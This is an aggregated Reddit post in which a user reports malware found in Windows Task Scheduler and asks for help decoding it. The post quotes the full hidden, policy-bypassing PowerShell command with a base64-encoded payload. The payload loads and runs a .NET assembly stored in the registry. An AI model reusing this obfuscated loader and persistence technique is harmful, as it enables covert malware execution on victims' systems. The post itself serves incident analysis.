all InfoSec news
Malware opening Powershell every minute. Can any one please decode and analyse this
Sept. 25, 2023, 8:26 a.m. | /u/Doge-Believer
Malware Analysis & Reports www.reddit.com
I found a malware in task scheduler.
It is running "C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" every minuteWith these arguments
`-WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -NoExit -Enc WwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAHMAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAagBhAGsAZQBmAFwAKQAuAGcAZgBmAGYAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA=`
I tried to decrypt using base64 ~~but didnt work~~ (working if i use UTF16-LE to decode).
I …
decode found malware malwarebytes mining powershell scheduler scripts startup task task scheduler window
More from www.reddit.com / Malware Analysis & Reports
[Video] Triaging Files on VirusTotal
2 weeks, 5 days ago |
www.reddit.com
Need recommendations for Premium Tools
2 weeks, 5 days ago |
www.reddit.com
A Powerful tracing engine based on Qemu
3 weeks, 4 days ago |
www.reddit.com
Jobs in InfoSec / Cybersecurity
Enterprise Threat Intel Analyst
@ Resource Management Concepts, Inc. | Quantico, Virginia, United States
IT Security Engineer III
@ Mitsubishi Heavy Industries | Houston, TX, US, 77046
Cyber Intelligence Vice President, Threat Intelligence
@ JPMorgan Chase & Co. | Singapore, Singapore
Assistant Manager, Digital Forensics
@ Interpath Advisory | Manchester, England, United Kingdom
Tier 3 - Forensic Analyst, SME
@ Resource Management Concepts, Inc. | Quantico, Virginia, United States
Incident Response, SME
@ Resource Management Concepts, Inc. | Quantico, Virginia, United States